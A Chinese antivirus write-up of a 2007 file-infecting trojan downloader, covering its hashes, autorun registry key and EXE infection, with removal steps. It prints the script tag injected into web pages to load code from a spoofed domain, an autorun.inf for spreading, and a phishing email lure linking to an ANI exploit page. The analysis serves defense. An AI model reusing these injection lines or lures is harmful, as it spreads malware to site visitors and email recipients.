病毒名称:Trojan-Downloader.Win32.Agent.bky(Kaspersky)
病毒别名:Worm.DlOnlineGames.a(瑞星)
Win32.MyInfect.af.16384(毒霸)
病毒大小:13,824 字节
13,312 字节
加壳方式:
样本MD5:1d9ad0c63ff4b43c28052db0f0cd23ae
e9100ce97a5b4fbd8857b25ffe2d7179
样本SHA1:8da40bc9d27e5d3707b0cc9710b5528c1b8e7404
a0a32e4bea2c3b366c0e0433f17ef9c9f9b41104
发现时间:2007.3
更新时间:2007.3.30
关联病毒:
传播方式:通过恶意网站传播,利用ani漏洞,感染exe可执行文件,修改htm等网页文件,发送邮件
技术分析
==========
病毒运行后复制自身到系统目录:
%System%\sysload3.exe
创建自启动项:
CODE:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"System Boot Check"="%System%\sysload3.exe"
"System Boot Check"="%System%\sysload3.exe"
调用IE进程(iexplore.exe)访问网络下载病毒配置信息,保存为%System%\config.ini,开启记事本(notepad.exe)进程开始感一系列病毒动作。
感染系统分区以外的.EXE文件,感染过程中会产生临时文件%System%\tempIcon.exe和%System%\tempload.exe,%System%\tempIcon.exe是病毒副本+被感染exe文件图标,添加到被感染exe文件前端;被感染exe文件尾部也增加8字节。
修改网页文件,
QUOTE:
.HTM
.HTML
.ASP
.ASPX
.PHP
.JSP
.HTML
.ASP
.ASPX
.PHP
.JSP
在这些文件的<body>代码后添加指向恶意地址的代码:
CODE:
<script src=http://macr.microfsot.com/Noindex.js></script>
尝试向A驱动器复制病毒副本:
A:\tool.exe
A:\autorun.inf
autorun.inf内容:
CODE:
[autorun]
Open=tool.exe
Shellexecute=tool.exe
Shell\0\command = tool.exe
Shell\0= 打开
Open=tool.exe
Shellexecute=tool.exe
Shell\0\command = tool.exe
Shell\0= 打开
尝试向QQ信箱发送邮件,QQ号码随机产生,正文里附带含有利用ani漏洞的恶意网页地址。
QUOTE:
发件人:[email]i_love_cq@sohu.com[/email]
收件人:[随机数字]@qq.com
主题:你和谁视频的时候被拍下的?给你笑死了!
正文:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
[url]http://macr.microfsot.com/20070326/134952.htm[/url]
收件人:[随机数字]@qq.com
主题:你和谁视频的时候被拍下的?给你笑死了!
正文:
看你那小样!我看你是出名了!
你看这个地址!你的脸拍的那么清楚!你变明星了!
[url]http://macr.microfsot.com/20070326/134952.htm[/url]
修改hosts文件,屏蔽一些域名,其中也包括其它同类病毒的下载域名。
病毒内文字信息:
QUOTE:
OK BMW xV4
QUOTE:
I will by one BMW this year! xV4
Mutex:MyInfect
清除步骤
==========
1. 结束notepad.exe进程和iexplore.exe进程
2. 删除病毒自启动项:
CODE:
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"System Boot Check"="%System%\sysload3.exe"
"System Boot Check"="%System%\sysload3.exe"
3. 删除文件:
%System%\sysload3.exe
%System%\config.ini
4. 使用反病毒软件进行全盘扫描,清除被感染的exe和网页文件
